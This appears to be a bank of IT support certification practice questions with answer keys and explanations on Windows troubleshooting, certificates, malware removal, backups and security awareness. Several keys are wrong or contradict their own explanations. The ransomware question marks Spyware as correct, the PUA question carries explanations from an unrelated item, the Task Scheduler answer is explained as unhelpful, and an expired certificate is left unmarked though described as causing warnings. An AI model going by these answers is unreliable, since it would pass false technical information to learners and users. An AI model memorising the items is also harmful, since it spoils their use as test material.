The IT Department has learned that a new employee starts on Monday and will need a computer just before the weekend. There is a used PC in the storeroom. A “ no operating system found “ message appears when the computer is rebooted after a technician installs Windows 10 on the computer with the hard drive partition style set to support Unified Extensible Firmware Interface (UEFI). Determine which of the following scenarios would generate that message.
Faulty motherboard
Application crash
Damaged hard drive
Corrupted MBR
Damaged hard drive
The hard drive stores the files for the operating system, so a damaged hard drive will generate the “no operating system found” message.
Applications do not load until after login, and the operating system would have to be found to load and display a login screen.
It is unlikely that a faulty motherboard would lead to a “no operating system found” error. It is more likely to cause the system not to boot, not recognize peripherals, or suffer the blue screen of death (BSOD).
Unified Extensible Firmware Interface (UEFI) generally does not interact with the Master Boot Record (MBR). The MBR is part of the legacy BIOS boot process.
A user disables some of the laptops’ services, thinking it would speed up performance. After restarting the laptop, “One or more services failed to start” appears. When the IT specialist opens the Services snap-in, they identify the failed service and restart it, but that does not fix it. Which of the following scenarios best explains why the restart did not work?
The failed service was set to delayed start.
The IT specialist should have restored the failed service instead of restarting.
The user disabled a dependent service.
The failed service was deleted.
The user disabled a dependent service.
Most Windows services are dependent on other services to run. If the user disabled a service that the failed service depended on, it would fail to start.
Service is restored if it is missing or has been deleted. The failed service still exists but failed to start due to disabled dependency.
Setting a service to delayed start is a way to improve Windows boot time since these services will not start until all other services are loaded. This setting will not cause a service to fail.
If the failed service were deleted, it would not have appeared as a service that failed to start.
While conducting an online search for cleaning services, a homeowner clicks on the link for one of the results. When the website loads, the page says, “Warning: Potential Security Risk Ahead.” What would cause this message to appear? (Select all that apply.)
SELECT ALL THAT APPLY
The certificate is issued by an untrusted CA.
Malware is trying to redirect the browser to a spoofed page.
The certificate has expired.
The cleaning service is no longer in business.
The certificate is issued by an untrusted CA.
Malware is trying to redirect the browser to a spoofed page.
Suppose a certificate was issued by a Certificate Authority (CA) untrusted. In that case, the URL is displayed with strikethrough formatting, and the site content is likely to be blocked by a warning message.
If a certificate is expired, the site content is likely blocked by a warning message.
A warning message could indicate that malware on the computer is attempting to redirect the browser to a spoofed page.
Even if the cleaning service went out of business and shut down their website, it would not generate a security message.
Which of the following scenarios would result in a website having an untrusted or invalid certificate? (Select all that apply.)
SELECT ALL THAT APPLY
The certificate is issued by a trusted CA.
The certificate is revoked.
The certificate is self-signed.
The certificate has expired.
The certificate is revoked.
The certificate is self-signed.
The certificate has expired.
Certificate warnings occur when a certificate is untrusted, such as a self-signed certificate, the padlock icon is replaced by an alert icon, the URL is displayed with strikethrough formatting, and the site content is likely to be blocked by a warning message.
Certificate warnings occur with an invalid certificate, such as an expired certificate.
Certificate warnings occur when a certificate is invalid, such as a revoked certificate. A certificate could be revoked because the site is misconfigured or malware attempts to direct the browser to a spoofed page.
Certificate warnings occur when a certificate is untrusted. A certificate issued by a trusted Certificate Authority (CA) would be a trusted certificate.
Two friends want to share photos with each other from their iPhones. The first friend selects their photos and uses AirDrop to share with the second friend. However, the first friend gets a message that there is no one nearby to share with. Why would that message appear?
The second friend has Wi-Fi disabled.
The second friend has Bluetooth disabled.
The first friend has Nearby Share disabled.
The first friend has Bluetooth disabled.
The second friend has Bluetooth disabled.
AirDrop is an iOs feature that allows file transfer between iOs devices and macOS devices over a Bluetooth connection. If the second friend had Bluetooth disabled, the first friend’s iPhone would not discover it when trying to share the photos.
AirDrop uses Bluetooth to transfer files, not Wi-Fi. Disabled Wi-Fi would not affect a Bluetooth connection.
Nearby Share is the Android version of AirDrop. It is used for simple file sharing via Bluetooth.
If the first friend had Bluetooth disabled, they would be alerted to turn Bluetooth on before sharing files.
An employee needs to ensure that the customer receives a professional support delivery. Which of the following does this include? (Select all that apply.)
SELECT ALL THAT APPLY
Provide proper documentation.
Deal appropriately with confidential and private materials.
Be on time.
Take routine personal phone calls
Provide proper documentation.
Deal appropriately with confidential and private materials.
Be on time.
The employee should be on time for each in-person appointment. If running late, call the customer as soon as possible to let them know.
A distraction is anything that interrupts an employee from the task of resolving the ticket. Avoid any personal calls while helping the customer.
Deal appropriately with confidential and private materials, showing the customer that privacy is respected by not opening files, emails, contacts, or web pages.
Proper documentation should be provided so that the customer knows what to expect in terms of supported items, how long incidents may take to resolve, and so on.
When a project team is constructing a change request document, a part that needs to be included is the number of devices, users, or customers that will be affected by the change. What is this part of the document?
End-user acceptance
Scope of the change
Purpose of the change
Rollback plan
Scope of the change
Scope of the change may include cost, timescales, and amount of devices involved. The scope should also include the factors by which the success or failure of the change can be judged.
The purpose of the change is the business case for making the change and the accumulated benefits.
End-user acceptance must be accounted for when a change of plan is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.
A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.
Advanced malware infection may require manual removal. Which of the following tools assists in manual malware removal? (Select all that apply.)
SELECT ALL THAT APPLY
WinPE
regedit
cleanmgr
msconfig
WinPE
regedit
msconfig
The Registry Editor (regedit) is a tool for making direct edits to the registry database, such as manually removing registry items.
The System Configuration Utility (msconfig) can be used to perform a safe boot to prevent any infected code from running at startup.
The Windows Preinstallation Environment (WinPE) can be used to run commands from a clean command environment after booting the computer with a recovery disc.
Disk Clean-up (cleanmgr) is a Windows utility tool that tracks files that can be safely erased, such as temporary files, to reclaim disk space.
A server administrator was hired at a startup company. The administrator has not established any services yet, but wants to set up basic domain services such as Active Directory, email, and domain name system (DNS). Which client operating systems will be compatible with domain-joined networks? (Select all that apply.)
SELECT ALL THAT APPLY
Pro
Enterprise
Home
Education
Pro
Enterprise
Education
The principal distinguishing feature of the Pro, Enterprise, and Education editions is joining a domain network.
The Enterprise edition can also join a domain network. Windows Enterprise has the full feature set but is only available via volume licensing.
The Education edition can also join a domain network. Windows Education/Pro Education are variants of the Enterprise and Pro editions designed for licensing by schools and colleges.
Home is the only edition that cannot join a domain network. The Windows Home edition is designed for domestic consumers and possibly small office home office (SOHO) business use.
A technician is using a tool with a secure erase function that performs a zero-filling on HDDs and marks all blocks as empty on SSDs. The SSD firmware’s automatic garbage collectors then perform the actual erase of each block over time. What is this tool?
Shredding
Erasing/wiping
Low-level formatting
Standard formatting
Low-level formatting
A low-level formatting tool resets a disk to its factory condition. Most of these tools will incorporate some sanitize function.
The standard formatting tool deletes partitions and writes a new file system that will only remove references to files and mark all sectors as useable.
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner. This overwriting method is suitable for all but the most confidential data.
Shredding is when the disk is ground into little pieces. A mechanical shredder works in much the same way as a paper shredder.
A company uses a method that restricts its employees from messing with their computer settings. What is this method called?
Disable guest accounts
Expiration requirements
Secure PII and passwords
BIOS
BIOS
Basic input/output (BIOS) password is a piece of authentication information that may sometimes require logging into a computer’s basic input/output system (BIOS) before the machine can boot up.
Expiration requirement means that the user must change the password after a set period.
Secure personal identifiable information (PII) and passwords are when paper copies of personal and confidential data must not leave where they could be read or stolen. This type of information should not be entered into unprotected plain text files, word processing documents, or spreadsheets.
Disabling guest accounts allow unauthorized access to the computer and may provide some network access. It is only enabled to facilitate password-less file sharing in a Windows workgroup.
A technician helps a customer with a ticket request and needs to record that the customer has accepted that the ticket can be closed. Which of the following fields reflect this part of the ticket life cycle?
Progress notes
Escalation levels
Problem resolution
Problem description
Problem resolution
Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.
Problem description records the initial request with any detail that could easily be collected at the time.
Progress notes record what diagnostic tools and processes have been discovered and identify and confirm a probable cause.
Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify the escalation levels. The ticket owner is the person responsible for managing the ticket.
An administrator uses a document list that identifies the discrete stages in the use of hardware and software. What is this document called?
Assigned users
Procurement life cycle
Warranty
Knowledge base
Procurement life cycle
The procurement life cycle includes approval request procedure changes, determining budgets, identifying a trusted supplier or vendor for the asset, deploying implementations for installing the asset in a secure configuration, maintenance, and disposal of implements.
Warranty is the asset record that includes the appropriate procurement documentation.
Assigned users are when hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to individual user accounts.
Knowledge base (KB) is a repository for articles that answer frequently asked questions (FAQs) and document common or significant troubleshooting scenarios and examples. Each inventory record could be tagged with a cross-reference to an internal knowledge base to implement self-service support and assist technicians.
Before an IT team can submit an application for change, it must include a document that includes an analysis of risks associated with performing the change and risks that might be incurred through not performing the requested change. What type of document is this?
Purpose of the change
Scope of the change
Date and time change
Affected systems
Purpose of the change
The purpose of the change is the business case for making the change and the accumulated benefits.
Scope of the change may include cost, timescales, and amount of devices involved. The scope should also include the factors by which the success or failure of the change can be judged.
Date and time change should be scheduled appropriately to minimize risks of system downtime or other negative impacts on the workflow of the business units that depend on the IT system being modified.
Affected systems must be considered in the implementation of change. Companies should first attempt to test the change for the most significant or major changes.
A security engineer runs a long tail analysis to determine the frequency of services and processes communicating to the internet. After baselining a large amount of normal traffic such as updates, they encounter a suspicious communication frequency every five minutes from a particular box. They have done a thorough job investigating running processes, memory analysis, and file integrity checks but find nothing. What else could the engineer check for persistence mechanisms that could send the communications?
lusrmgr.msc
Privileged time
taskschd.msc
msconfig.exe
taskschd.msc
The Task Scheduler (taskschd.msc) runs software and scripts according to calendar or event triggers which would not help diagnose and troubleshoot internet connectivity issues.
The Local Users and Groups (lusrmgr.msc) console provides an advanced interface for creating, modifying, disabling, and deleting user accounts.
Privileged time is used to compare against user time. If it is much higher, the central processing unit (CPU) is likely underpowered (it can barely run Windows core processes efficiently).
The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect how the computer boots and loads Windows.
A forensic investigator is told that a server’s processor that does not normally run high has been over-utilized lately, and they suspect possible malware. The investigator wants to start by investigating processes. Which command can they use to start the investigation? (Select all that apply.)
SELECT ALL THAT APPLY
top
man
ps
grep
top
ps
The ps command invokes the process table, a record that summarizes the currently running processes on a system.
The top command lists all processes running on a Linux system like ps. It acts as a process management tool by enabling users to prioritize, sort, or terminate processes interactively.
The grep (globally search a regular expression and print) command is used to search and filter the contents of files.
Linux users can use man to view the help pages for a particular command. For example, use man to view the help pages for the man command.
A vulnerability management lead wants to set up the company using a more secure authentication method than a simple password. What hardware aspect should the management lead consider?
CPU requirements
Hardware token
Integrated graphics card
Dedicated graphics card
Hardware token
An external hardware token is a smart card or USB form factor device that stores cryptographic user identification data. The user must present the token and supply a password, PIN, or fingerprint scan to authenticate.
Central processing unit (CPU) requirements refer to the performance and features of the computer’s main processor.
A demanding application, such as graphic design software or a game, will not help the company to use a more secure authentication method.
An integrated graphics card would also not help the company to use a more secure authentication method.
A company has hundreds of employees who use the same software on their computers, so they offer a company product key to access the software. What is this product?
Corporate-use license
DRM
Data retention requirements
Personal license
Corporate-use license
A corporate-use license is for multiple users, which means the company can install the software on an agreed-upon number of computers for its employees to use simultaneously. The company will offer a valid license with the product key. These can be non-expired licenses as well.
A personal license allows the product to be used by a single person at a time, though it might permit installation on multiple personal devices.
Data retention requirements are regulations that set a maximum period for data retention. The regulation might also demand that information be retained for a minimum period.
Digital music and video are often subject to copy protection and digital rights management (DRM).
A vulnerability manager is brainstorming different ways to enhance security for their cell phone devices. The company only uses Apple, and so one of the ideas the manager comes up with is to look for anomalistic files that do not belong with Apple for signs of possible malware which did not profile the device and instead just blasted malware out, hoping the operating system would be right. Which of the following would be anomalistic?
.dmg
.app
.apk
.pkg
.apk
An .apk file is a format for Android. The vulnerability manager only has Apple in their environment. Unknown sources enable untrusted apps to be downloaded from a website and installed using the .APK file format.
DMG (disk image) format is used for simple installs where the package contents need to be copied to the Applications folder.
PKG format is used where app setup needs to perform additional actions, such as running a service or writing files to multiple folders.
The app is placed in a directory with a .APP extension in the Applications folder when it has been installed.
A systems administrator wants to create a scheduled task throughout the environment, which does a basic health check at night when users are not working. Which command should the administrator use in their scheduled task?
format
chkdsk
xcopy
diskpart
chkdsk
chkdsk scans the file system and disk sectors for faults and can attempt to repair any problems detected.
The format command writes a new file system to a drive. This process deletes any data existing on the drive. This could be catastrophic if used in the wrong way.
The xcopy command is a utility that allows administrators to copy the contents of more than one directory at a time and retain the directory structure.
Diskpart is the command interface underlying the Disk Management tool. Diskpart deals with partitions and management.
A security awareness trainer spends a good portion of the training class talking about phishing, given its popularity as an attack vector. Phishing campaigns are getting more sophisticated, so the trainer is helping the class learn how to identify a phishing email. Which of the following is an indicator of phishing? (Select all that apply.)
SELECT ALL THAT APPLY
Disguised links
No signature
Inconsistent sender and reply to addresses
Urgency
Disguised links
Inconsistent sender and reply to addresses
Urgency
Many phishing emails have a sense of urgency so that the recipient will act now or else it will be too late. In business, this could be an email that appears to be from the boss, who needs something right away.
The email sender’s address (the FROM address) should be consistent with the REPLY-TO address.
Links in phishing emails can be disguised. For example, a link that appears to be www.microsoft.com, reveals a very different URL, such as www.maliciouslink.com, when the cursor hovers over the link.
An email with no signature is not an indicator of phishing.
A user wants to share their printer with other teams, but not all teams use the same operating system. What can the user do to configure functionality with the other teams?
Additional drivers
Proxy settings
Mapped drive
File server
Additional drivers
Use the additional drivers’ button to make drivers available for different client operating systems. For example, if the print server is Windows 10 64-bit, it can make 32-bit Windows 7 drivers available.
Configuring the proxy settings will not help with printer functionality. The settings for proxy information can be found in internet options.
A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.
A file server would not help with printer functionality, although a printer server could assist with this endeavor.
Over the day, a user’s computer becomes slow. Then pop-ups start to appear randomly. Later on, the pop-ups become more frequent, and the user notices that internet searchers are using Google when their default search provider is in Firefox. Once the computer starts crashing repeatedly, the user calls for help. Considering all of these data points, what is the best diagnosis of the problem?
Adware or spyware infection
Ransomware
HOSTS file is corrupted and is mapping domain names to the wrong IP addresses.
DNS server is corrupted and is mapping domain names to the wrong IP addresses.
Adware or spyware infection
All of the symptoms listed in this scenario are common to adware and spyware. Another symptom is redirection, where a user tries to open one page but gets sent to another.
The goal of ransomware is extortion. Ransomware encrypts files to shut down access to data until payment is made.
A DNS server mapping domain names to the wrong IP addresses is an example of a redirection attack, where a user is redirected to a malicious site. It does not generate the other symptoms.
HOSTS is a legacy means of mapping domain names and IP addresses. If corrupted and incorrectly mapped, it is a redirection attack, and the other symptoms do not occur.
The System Restore tool in Windows is used to roll back configuration changes to an earlier date or restore point. One option for creating restore points is to use Task Scheduler. What other actions will create a restore point? (Select all that apply.)
SELECT ALL THAT APPLY
Updating an application
Installing a program
Deleting a file
Rebooting
Updating an application
Installing a program
Whenever an application or program is installed, a restore point is created.
A restore point is also created whenever an application or program is updated.
Deleting a file will not create a restore point. Likewise, when using System Restore to roll back to an earlier date, the user’s documents, pictures, and other data are not deleted. However, software and drivers installed after the restore point will be uninstalled.
A restore point is not created when a computer is rebooted, but Windows will create a restore point if one has not occurred in seven days.
An analyst is a method that calculates a product of the likelihood and impact of the potential threat category. What is this method?
Sandbox testing
End-user acceptance
Risk levels
Rollback plan
Risk levels
Risk levels are included in the risk assignment that could be expressed as a discrete value or as a traffic light-type of indicator, where red is high, orange is moderate risk, and green is minimal risk.
Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.
A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.
End-user acceptance must be accounted for when a change of plan is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.
An administrator reviews a series of instructions that the workstation follows every time a user logs on. What is this called?
MDM
Group policy
Login script
Home folder
Login script
Login script performs configuration or process activity when the user signs in. A login script can be defined via the user profile or assigned to an account via group policy.
Group policy configures computer settings and user profile settings. A group policy can also be used to deploy software automatically.
Mobile device management (MDM) is a class of software designed to apply security policies to mobile devices in the enterprise.
A home folder is a private drive mapped to a network share to store personal files. The home folder location is configured via the account properties on the Profile tab using the connect to box.
A local jewelry maker sets up a booth at a craft fair. When the first customer makes a purchase, the vendor’s contactless card reader will not recognize the customer’s wallet app. Which of the following could solve the problem?
Hold the mobile device closer to the reader and wait.
Turn on airplane mode.
Use biometric authentication.
Enable RFID.
Hold the mobile device closer to the reader and wait.
Contactless card readers use near-field communication (NFC). NFC normally works at up to two inches (6 cm), so moving the device closer to the reader could solve the problem.
Turning on airplane mode will disconnect NFC.
Biometric authentication allows a user to perform a biometric scan to operate an entry or access a system. Typical features used include facial pattern, iris, retina, fingerprint pattern, and signature recognition.
Radio Frequency ID (RFID) is a means of identifying and tracking objects, such as parcels, equipment, or access badges, using specially encoded tags.
A video game development company is purchasing upgraded laptops to develop cutting-edge graphics for a new story they have been marketing. They want to be able to integrate persistent system RAM. What type of operating system should they use for support?
Enterprise
Home
Pro for Workstations
Pro
Pro for Workstations
Windows Pro for Workstations has many of the same features as Pro but supports more maximum RAM and advanced hardware technologies, such as persistent system RAM (NVDIMM).
Windows Pro is designed for usage in small- and medium-sized businesses and can be obtained using original equipment manufacturer (OEM), retail, or volume licensing.
The Enterprise edition has several features not available in the Pro edition, such as support for Microsoft’s DirectAccess virtual private networking technology, AppLocker, and more.
The Windows Home edition is designed for domestic consumers and possibly small office home office (SOHO) business use.
During the IT team’s weekly meeting, the topic of improving the overall cyber hygiene of the company turns into a discussion about the employee’s lack of security awareness. Why would the IT team members focus on employee behavior? (Select all that apply.)
SELECT ALL THAT APPLY
Hashing
Jailbreaking
Phishing
Social engineering
Phishing
Social engineering
Social engineering uses deception and trickery to convince users to provide sensitive data or violate security guidelines. People are susceptible to social engineering as part of the human condition, so training is necessary to overcome that instinct.
Phishing is when an attacker sends an email from a supposedly reputable source, such as a bank, to elicit private information from the victim. It is easy to be duped by phishing emails, so training is necessary so users can identify these scams.
Hashing is an encryption process that takes any amount of data as input and produces a fixed-length value as output.
Jailbreaking subverts the security controls built into the operating system to gain unrestricted system-level access.
A technician is implementing a Linux shell script that each statement comprising the actions that the script will perform is then typically added on separate lines. Which of the following is this?
.ps1
.sh
.vbs
.bat
.sh
.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line designating which interpreter to use, such as Bash or Ksh. It includes a series of commands that run consecutively to carry out tasks.
.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.
.vbs is the VBScript file extension. VBScript predates Powershell. The wscript.exe interpreter executes VBScript by default.
.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.
A threat actor uses a technique that allows devices to connect to an open authentication and then redirect the user’s browser to a fake captive portal that encourages the user to enter their network password. What is this technique?
Spoofing
Insider threat
Whaling
Evil twin
Evil twin
Evil twin attack is like phishing, but instead of an email, the attacker uses a rogue wireless access point to try to harvest credentials.
Whaling is an attack directed specifically against levels of management in the organization. Upper management may also be more vulnerable to common phishing attacks because of their reluctance to learn basic security procedures.
An insider threat is an employee or other person with immediate access to internal components of the company or organization.
A spoofing threat is any attack where the threat actor can masquerade as a trusted user or computer.
A Linux administrator sets up a development environment where they can install and test new packages. Which of the following commands will help the administrator accomplish this? (Select all that apply.)
SELECT ALL THAT APPLY
ip
df
yum
apt-get
yum
apt-get
apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.
yum is the command interface for YUM. Yum install PackageName installs a new application.
As part of the iproute2 package, the ip command has options for managing routes and the local interface configuration. The command ip addr replicates the basic reporting functionality of ifconfig (show the current address configuration).
df (“disk free”) lets the user view the device’s free space, file system, total size, space used, percentage value, and mount point.
What can use a trusted platform module chip in the computer to tie the use of a fixed disk to a particular motherboard?
Application security
Inheritance
Port security
BitLocker
BitLocker
BitLocker is a disk encryption product available with all Windows editions except for the Home edition. Full disk encryption carries a processing overhead, but modern computers usually have the processing capacity to spare. It can also be used with removable drives in its BitLocker To Go form.
Port security triggers are based on the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) port number used by the application protocol.
Application security triggers are based on the process that listens for connections.
Inheritance permission assigned to a folder is automatically inherited by the file and subfolder created under the folder.
A helpdesk operator looks at build numbers for Windows as they plan upgrade timelines. The operator investigates the significance of the build numbers. Which of the following are the build numbers based on? (Select all that apply.)
SELECT ALL THAT APPLY
Windows version
Year
32 bit vs 64 bit
Time of year
Year
Time of year
The number 16 in build 1607 corresponds to the year (2016) of release.
The 07 portion of build 1607 represents the month (07/July) of release. The current version of Windows 10 at the time of writing is 21H2, released in the second half of 2021.
Versioning is not part of it. Windows 10 and Windows 11 represent the currently supported versions of the Windows client OS.
The architecture is not part of it either. Each version and edition of Windows 10 was originally available as 32-bit (x86) or 64-bit (x64) software. A 32-bit CPU can only run the 32-bit editions. A 64-bit CPU can run either.
A user has owned the same personal computer for a while and thinks it might be time for an upgrade. Which of the following are upgrade considerations? (Select all that apply.)
SELECT ALL THAT APPLY
PXE support
Application support
Hardware compatibility
Backup files
Application support
Hardware compatibility
Backup files
Hardware compatibility is a consideration. The user must make sure that the central processing unit (CPU), chipset, and RAM components are sufficient to run the OS.
Application and driver support and backward compatibility are other considerations. Most version upgrades try to maintain support for applications and device drivers developed for older versions.
Backup files and user preferences are a consideration. If the user is installing a new operating system or doing a clean install, the user should back up any necessary data and settings.
Most computers now come with a Preboot eXecution Environment (PXE)–compliant firmware and network adapter to support this boot option and is not necessarily a consideration.
A technician is cleaning a computer and notices dust forming over the fan blades and ventilation slots. What can the technician use to perform dust cleanup? (Select all that apply.)
SELECT ALL THAT APPLY
Domestic vacuum
Natural bristle brush
Compressed air blaster
PC vacuum cleaner
Natural bristle brush
Compressed air blaster
PC vacuum cleaner
A compressed air blaster can be used to dislodge dust from difficult-to-reach areas. When performing this sort of maintenance within a controlled area, wear an appropriate air-filter mask and goggles.
The PC vacuum cleaner can be used to blow air and suction to replace the need for the compressed air canister. Such vacuums should be labeled as toner safe.
Natural bristle brushes remove dust from inside the system unit, especially from the motherboard, adapter cards, and fan assemblies.
Domestic vacuum appliances should not be used as they can produce high levels of static electricity.
An IT specialist removes malware from a computer system and then re-enables System Restore. Then a new restore point is created, all security-critical services and settings are validated, and the DNS configuration is verified. However, when the specialist runs a final antivirus scan, it detects malware. Considering all the steps taken, which would explain why there was still malware on the system?
C&C network connection was detected.
DNS spoofing was detected.
Port forwarding was detected.
Cross-site scripting was detected.
C&C network connection was detected.
The IT specialist did not inspect the firewall configuration and therefore failed to find the changes that allowed a command and control (C&C) network to establish a connection.
Domain Name System (DNS) spoofing is when an attacker directs a victim away from a legitimate site and towards a fake site.
Port forwarding is the process in which a router takes requests from the internet for a particular application and sends them to a designated host on the LAN.
Cross-site scripting (XSS) is when a malicious script is hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser’s security model of trusted zones.
Many mobile apps collect location data. Rogue apps could use location data for criminal purposes, such as burglary. However, many legitimate apps also track a mobile user’s location. Why would a legitimate app have interest in a user’s location?
Clicks
Geotagging
Targeted advertising
Redirection
Targeted advertising
Legitimate apps are interested in tracking a user’s location for targeted advertising. For example, Facebook tracks the location of its users for that very reason, although it is facing scrutiny over privacy issues.
Geotagging is adding geographic data and location to photos. An app would not track a user’s location to tag their pictures.
Redirection is a malware attack, where the malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites.
The pursuit of clicks typically is the area of interest for adware since developers are paid when users click on the advertisements.
A user implements a technique that requires an input of 4- or 6- digits to gain access to their device. What is this technique?
Pattern
Facial recognition
Swipe
PIN
PIN
Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.
Swipe is a gesture that means that access to the device is unauthenticated. Simply swiping across the screen will unlock the device.
Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.
Facial recognition is a method that creates a template computer from a 3-D image of the user’s face. A facial bio gesture has the advantage of using the camera rather than a special sensor.
A user calls the help desk with issues consistent with a malware infection, although the user received no alert. The technician confirms that there was no malware alert. Which of the following options would be an appropriate next step? (Select all that apply.)
SELECT ALL THAT APPLY
Log on to the system as an administrator.
Scan the system using different antivirus software.
Remove the malware.
Update the antivirus software.
Scan the system using different antivirus software.
Update the antivirus software.
Since the installed antivirus software did not pick up the malware infection, scanning the system with a different antivirus product is a good option since some products pick up what others do not.
The antivirus software may not have detected the malware infection because it was not updated. Updating antivirus software before running scans is a best practice.
Logging on to a malware-infected system as an administrator exposes their privileged account access credentials for the malware to exploit.
Removing the malware is a few steps ahead of the current scenario.
A user downloaded a script, but the file was in a text file format. The user needs to change the extension to a PowerShell script to run it, but they do not see the extension. Where can the user configure this setting?
Internet Options
Ease of Access
File Explorer General tab
File Explorer View tab
File Explorer View tab
On the File Explorer View tab, among many other options, users can configure hidden extensions, hidden files, and hide operating system files.
On the File Explorer General tab, users can set options for the layout of Explorer windows and switch between the single-click and double-click styles of opening shortcuts.
Ease of Access settings configures input and output options to best suit each user. There are three main settings groups.
The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab restricts what types of potentially risky active content are allowed to run.
A user finds that their iPhone 5 starts to run slowly, and a reboot does not solve the slow performance. Which of the following issues could be causing the problem? (Select all that apply.)
SELECT ALL THAT APPLY
Low battery charge
OS update
Too many apps open
Mesh network
Low battery charge
OS update
Too many apps open
If a battery is almost out of charge, it could cause slowness, as will a faulty battery or other faulty hardware.
If too many apps are open, a phone could become slow because the open apps are consuming most of the phone’s resources.
An operating system (OS) update on an older phone can severely impact performance.
A mesh network provides communication between devices or nodes using some type of mesh networking, such as Z-Wave or Zigbee, which uses less power and makes it easier for smart devices to forward data between nodes.
What is also known as a potentially unwanted application (PUA) and should be removed from the computer?
Potentially Unwanted Application (PUA)
Operating System Update
Antivirus Software
Productivity Tools
Potentially Unwanted Application (PUA)
An untrusted source is when an installer cannot be verified through a digital signature or has been a security risk and is likely to expose the user to unwanted adverts. Some untrusted sources do not block ads or have pop-up blockers.
As the browser is a security-critical type of software, it is particularly important to use a trusted source, such as an app store. Likewise, if installed as a desktop application, the user should ensure using a reputable vendor.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
A secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.
A software development team is unaware of a developing vulnerability in the system. What is this type of vulnerability?
EOL
Impersonation
BYOD
Zero-day attack
Zero-day attack
A zero-day attack is a vulnerability exploited before the developer knows about it or can release a patch. These can be extremely destructive, as it can take the vendor a lot of time to develop a patch, leaving systems vulnerable for days, weeks, or even years.
End of life (EOL) system is where the software vendor no longer provides support or fixes problems.
Bring your own device (BYOD) provides modeling that allows employees to use personal mobile devices to access corporate systems and data.
Impersonation means that the social engineer develops a pretext scenario to interact with an employee.
A server administrator migrates their environment from physical servers to a virtualized environment. The administrator wants to install new virtual machine operating systems. What is the best approach to use regarding deploying virtualized OSs?
ISOs
Physical media
Proxy
Downloadable
ISOs
ISO files stored on removable media or a host system are often used to install virtual machine operating systems. A mountable ISO is often used to install complex apps, such as databases, where there are many separate components and large file sizes to install.
An ISO file could be distributed on physical media, such as CD/DVD or a USB thumb drive, but typically is done through file sharing on an enterprise network.
An ISO can be downloaded, although the administrator should check to ensure that the file hash matches the official hash.
While the administrator is probably routing through a proxy at their company, most proxies have a file size limit that they do not scan if over a certain size.
Which of the following malware tries to extort money from the victim?
Trojan
Spyware
Boot sector virus
Ransomware
Spyware
Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and many more.
Viruses are concealed within the code of an executable process image stored as a file on a disk.
Trojans are malware concealed within an installer package for software that appears to be legitimate. The malware will be installed alongside the program and executed with the same privileges.
Boot sector viruses can infect the boot sector code or partition table on a disk drive.
Which of the following backup procedures state that users should have three copies of their data across two media types, with one copy held off-line and off-site?
Frequency
GFS
Synthetic
3-2-1 backup rule
3-2-1 backup rule
3-2-1 backup rule is a best-practice maxim that users can apply to their backup procedures to verify that they are implementing a solution to mitigate the widest possible range of disaster scenarios.
Grandfather-father-son (GFS) is a backup rotation scheme that uses son tapes to store the most recent data and have the shortest retention period. Grandfather tapes are the oldest and have the longest retention period.
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
The synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.
A manager for a Linux server team recently purchased new software which will help to streamline operations, but they are worried that in IT, there is a high turnover of personnel. The manager wants to ensure they can obtain updates, monitor and fix security issues, and are provided technical assistance. What impact is the manager trying to mitigate?
Training
Network
Licensing
Support
Support
Given the unpredictable state of IT staffing, the software might be available with paid-for support to obtain updates, monitor and fix security issues, and provide technical assistance.
With licensing, commercial software must be used within the constraints of its license but is likely to restrict the number of devices on which the software can be installed.
Complex apps can have a substantial and expensive user-training requirement, which can be an ongoing cost as new versions can introduce interface or feature changes.
When selecting applications for installation on desktops, proper security considerations need to be made regarding potential impacts to the device (computer) and the network.
An attacker is trying multiple times to login into a user’s phone, but the phone ends up being disabled. What is this called?
Failed attempts lockout
Use timeout/screen lock
Disable AutoRun
Concurrent logins
Failed attempts lockout
Failed attempts lockout is when a maximum number of incorrect sign-in attempts occur within a certain period. Once the maximum number of incorrect attempts has been reached, the account will be disabled.
Concurrent logins limit the number of simultaneous sessions a user can open. Most users should only need to sign in to one computer at a time.
Use timeout/screen lock is when the desktop is locked if the system detects no user-input device activity. Users should not rely on this and lock the computer manually when leaving it unattended.
Disable AutoRun so that malware can not be installed automatically. Some versions of Windows require an optical disc inserted or USB drive to be attached so that the AutoRun command installs.
A technician creates full backups by having the chain start with an initial full backup as normal and afterward makes a series of incremental backups. Which of the following backups is this?
Synthetic
Frequency
On-site backup storage
Retention
Synthetic
A synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.
On-site backup storage means that the production system and backup media are in the same location. Having storage in the same location risks losing both the production and backup copies of the data.
